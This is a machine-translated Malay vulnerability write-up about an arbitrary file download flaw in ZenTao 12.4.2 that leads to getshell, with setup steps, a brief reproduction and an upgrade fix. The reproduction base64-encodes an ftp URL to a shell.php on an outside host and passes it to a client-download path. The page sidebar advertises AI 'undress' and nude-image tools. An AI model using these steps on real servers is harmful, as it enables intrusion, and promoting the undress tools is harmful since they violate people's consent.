Operasi dan penyelenggaraanKeselamatanApakah hak pentadbir latar belakang Getshell dalam ZenTao 12.4.2?Apakah hak pentadbir latar belakang Getshell dalam ZenTao 12.4.2?
0x00Pengenalan
ZenTao ialah perisian pengurusan projek R&D sumber terbuka domestik profesional yang mengintegrasikan pengurusan produk dan pengurusan projek, kualiti pengurusan, pengurusan dokumen, pengurusan organisasi dan pengurusan transaksi, merangkumi sepenuhnya proses teras pengurusan projek R&D. Idea pengurusan adalah berdasarkan kaedah pengurusan projek tangkas yang popular di peringkat antarabangsa - Scrum Atas dasar mengikut nilainya dan menggabungkan status semasa penyelidikan dan pembangunan projek domestik, ia mengintegrasikan pelbagai fungsi seperti pengurusan tugas, pengurusan permintaan, pepijat. pengurusan, pengurusan kes penggunaan, dsb., meliputi perisian daripada perancangan hingga ke seluruh kitaran hayat keluaran.
Gambaran Keseluruhan Kerentanan 0x01
Terdapat kerentanan muat turun fail sewenang-wenangnya dalam ZenTao versi 12.4.2 Kerentanan ini disebabkan oleh penapisan longgar dalam kaedah muat turun dalam klien kelas, yang boleh dicapai menggunakan ftp Tujuan memuat turun fail. Dan direktori storan fail yang dimuat turun boleh menghuraikan fail php, menyebabkan getshell.
0x02 versi terjejas
ZenTao ≤ 12.4.2
0x03 pembinaan persekitaran
phpstudy2018 12.4.2 Alamat muat turun rasmi ZenTao:
https://www.zentao.net/dynamic/zentaopms12.4.2-80263.html
3.1. Selepas muat turun selesai, letakkan Just install ia dalam phpstudy
3.2 Semak sambungan Jika ada sambungan yang gagal, buka sahaja sambungan itu.
3.3 Tetapkan maklumat pangkalan data, di sini tetapkan kepada konfigurasi pangkalan data anda sendiri.
3.4. Tetapan dan pemasangan akaun selesai
3.4. Gunakan persekitaran untuk menyediakan dan mendayakan perkhidmatan ftp Dengan mengambil windows2008R2 sebagai contoh, tambah peranan dan tambah ftp
3.5 dalam Perkhidmatan Maklumat Internet Tambah perkhidmatan ftp ke tapak web di bawah.
3.6 Konfigurasikan mengikut situasi anda sendiri, langkah seterusnya ialah
0x04. pengulangan kerentanan
1 Mula-mula tambah laluan ftp ke shell dan lakukan pengekodan base64 Sebelum penyulitan: ftp://192.168.3.200/shell.phpSelepas penyulitan: ZnRwJTNBLy8xOTIuMTY4LjMuMjAwL3NoZWxsLnBocA==2 Gunakan EXP dan masukkan base64 yang disulitkan ke dalam php /client-download-1-
3 laluan untuk menguji Adakah shell telah dimuat turun ke pelayan >0x05 kaedah pembaikan
1 Naik taraf kepada ZenTao 12.4.3 dan versi yang lebih baru
Atas ialah kandungan terperinci Apakah hak pentadbir latar belakang Getshell dalam ZenTao 12.4.2?. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!
Alat AI Hot
Undresser.AI Undress
Apl berkuasa AI untuk mencipta foto bogel yang realistik
AI Clothes Remover
Alat AI dalam talian untuk mengeluarkan pakaian daripada foto.
Undress AI Tool
Gambar buka pakaian secara percuma
Clothoff.io
Penyingkiran pakaian AI
AI Hentai Generator
Menjana ai hentai secara percuma.
Artikel Panas
Alat panas
Hantar Studio 13.0.1
Persekitaran pembangunan bersepadu PHP yang berkuasa
Versi Mac WebStorm
Alat pembangunan JavaScript yang berguna
SublimeText3 versi Mac
Perisian penyuntingan kod peringkat Tuhan (SublimeText3)
DVWA
Damn Vulnerable Web App (DVWA) ialah aplikasi web PHP/MySQL yang sangat terdedah. Matlamat utamanya adalah untuk menjadi bantuan bagi profesional keselamatan untuk menguji kemahiran dan alatan mereka dalam persekitaran undang-undang, untuk membantu pembangun web lebih memahami proses mengamankan aplikasi web, dan untuk membantu guru/pelajar mengajar/belajar dalam persekitaran bilik darjah Aplikasi web keselamatan. Matlamat DVWA adalah untuk mempraktikkan beberapa kelemahan web yang paling biasa melalui antara muka yang mudah dan mudah, dengan pelbagai tahap kesukaran. Sila ambil perhatian bahawa perisian ini
Dreamweaver Mac版
Alat pembangunan web visual
